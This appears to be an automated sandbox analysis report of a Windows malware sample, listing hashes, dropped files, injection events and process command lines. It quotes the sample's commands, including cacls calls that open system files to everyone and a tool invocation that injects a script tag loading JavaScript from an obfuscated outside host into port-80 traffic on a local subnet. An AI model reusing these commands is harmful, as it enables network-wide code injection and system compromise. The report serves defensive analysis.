f8d8cc148780ddee06315105a0cffa14df78b301aeefcc61c0df85806ecb0701

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
23/08/2024, 16:52

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe
Size

525KB
MD5

bc8c9a6238d401deef5d4be9762111d0
SHA1

7bfedd5c4701d3baf2e2877ae617436c39b72d1f
SHA256

f8d8cc148780ddee06315105a0cffa14df78b301aeefcc61c0df85806ecb0701
SHA512

6c34c13bc2175a5972984eab4f997611b440566b4505d5e74ff03f1a0c7817e4ac63d55c8874768c1f3c254485adbee41e0af9aa7f3d46f3a1588ac2611777c4
SSDEEP

6144:ThcMSbaohE9q2PsXrSVew/X2+wZHeSPVep6s6BCF6GfEWfadRNH0QGKoS:TSNa2E9/cZw/X6eSPtfS6G6NoS

Score

8^/10

discovery

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\drivers\npf.sys	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe

Deletes itself 1 IoCs

pid	Process
2232	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3068	360ucwu.exe

Loads dropped DLL 5 IoCs

pid	Process
2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe
2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe
3068	360ucwu.exe
3068	360ucwu.exe
3068	360ucwu.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Packet.dll	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WanPacket.dll	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wpcap.dll	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\360ucwu.exe	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2976 wrote to memory of 2336	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	30
PID 2976 wrote to memory of 2336	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	30
PID 2976 wrote to memory of 2336	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	30
PID 2976 wrote to memory of 2336	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	30
PID 2976 wrote to memory of 2856	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	32
PID 2976 wrote to memory of 2856	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	32
PID 2976 wrote to memory of 2856	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	32
PID 2976 wrote to memory of 2856	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	32
PID 2976 wrote to memory of 2736	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	34
PID 2976 wrote to memory of 2736	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	34
PID 2976 wrote to memory of 2736	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	34
PID 2976 wrote to memory of 2736	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	34
PID 2976 wrote to memory of 2212	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	36
PID 2976 wrote to memory of 2212	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	36
PID 2976 wrote to memory of 2212	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	36
PID 2976 wrote to memory of 2212	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	36
PID 2976 wrote to memory of 2636	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	38
PID 2976 wrote to memory of 2636	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	38
PID 2976 wrote to memory of 2636	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	38
PID 2976 wrote to memory of 2636	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	38
PID 2976 wrote to memory of 3068	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	41
PID 2976 wrote to memory of 3068	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	41
PID 2976 wrote to memory of 3068	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	41
PID 2976 wrote to memory of 3068	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	41
PID 2976 wrote to memory of 2232	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	43
PID 2976 wrote to memory of 2232	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	43
PID 2976 wrote to memory of 2232	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	43
PID 2976 wrote to memory of 2232	2976	bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe	43

C:\Users\Admin\AppData\Local\Temp\bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bc8c9a6238d401deef5d4be9762111d0_JaffaCakes118.exe"
1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2976
- C:\Windows\SysWOW64\cacls.exe
  "C:\Windows\system32\cacls.exe" C:\Windows\system32\drivers\npf.sys /e /p everyone:f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2336
- C:\Windows\SysWOW64\cacls.exe
  "C:\Windows\system32\cacls.exe" C:\Windows\system32\Packet.dll /e /p everyone:f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2856
- C:\Windows\SysWOW64\cacls.exe
  "C:\Windows\system32\cacls.exe" C:\Windows\system32\WanPacket.dll /e /p everyone:f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2736
- C:\Windows\SysWOW64\cacls.exe
  "C:\Windows\system32\cacls.exe" C:\Windows\system32\wpcap.dll /e /p everyone:f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2212
- C:\Windows\SysWOW64\cacls.exe
  "C:\Windows\system32\cacls.exe" C:\Windows\system32\npptools.dll /e /p everyone:f
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2636
- C:\Windows\SysWOW64\360ucwu.exe
  -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://b%77z.K%77%69k.%54o/tj.js></script>"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3068
- C:\Windows\SysWOW64\cmd.exe
  cmd /c 12.bat
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:2232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\12.bat

Filesize
2KB

MD5
9a3059f67908165abf03b7cb7741ba11

SHA1
1881920b6e7b49cdff05616e8ec99af8b92d1c5a

SHA256
d5f826bac43cf190b98408189a3d7dfa1890647f0199b9d60c84f85a76ed1891

SHA512
d5c9b1e8e06848594d1c572b5df5bf14c935d0a8d23c2ded758ca2621ec74f3e64982b98ccf2360763b1ec66d30165c025383ebe788e25867f44f2344e3cf961

Download Submit
\Windows\SysWOW64\360ucwu.exe

Filesize
8.0MB

MD5
2ed9163d3a4c130dc2f730fa3364657c

SHA1
a63b7959e2bece3f0bbba0552fe317bed5ca532a

SHA256
de085eb65237708f93873a2fe3f809a204b1e205bed5d1cea03eeb3056ede781

SHA512
1af133964522bebe4f2586faaf3ea30877cb3cc2e49fb36589f0fb44a34a3f7a86ee58ad5a48ab1dcd7a46cd016f6ab12f7d7b55b713f59e78d7e7a61b398bed

Download Submit
\Windows\SysWOW64\Packet.dll

Filesize
86KB

MD5
9062aeea8cbfc4f0780bbbefad7cebcb

SHA1
c4ad39ec51ad0e84fe58f62931d13cddfde3189e

SHA256
b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

SHA512
60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

Download Submit
\Windows\SysWOW64\WanPacket.dll

Filesize
66KB

MD5
fdd104a9fd3427a1df37041fa947a041

SHA1
cca1881a3c02033008f78cc39b712b637c7f3e13

SHA256
384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

SHA512
9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

Download Submit
\Windows\SysWOW64\wpcap.dll

Filesize
234KB

MD5
ce842d25e5b7e6ff21a86cad9195fbe8

SHA1
d762270be089a89266b012351b52c595e260b59b

SHA256
7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

SHA512
84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

Download Submit
memory/2976-0-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/2976-1-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/2976-8-0x00000000003F0000-0x00000000003FF000-memory.dmp

Filesize
60KB

Download
memory/2976-31-0x0000000000400000-0x0000000000485000-memory.dmp

Filesize
532KB

Download
memory/3068-23-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/3068-22-0x0000000000030000-0x0000000000040000-memory.dmp

Filesize
64KB

Download
memory/3068-19-0x0000000000220000-0x0000000000235000-memory.dmp

Filesize
84KB

Download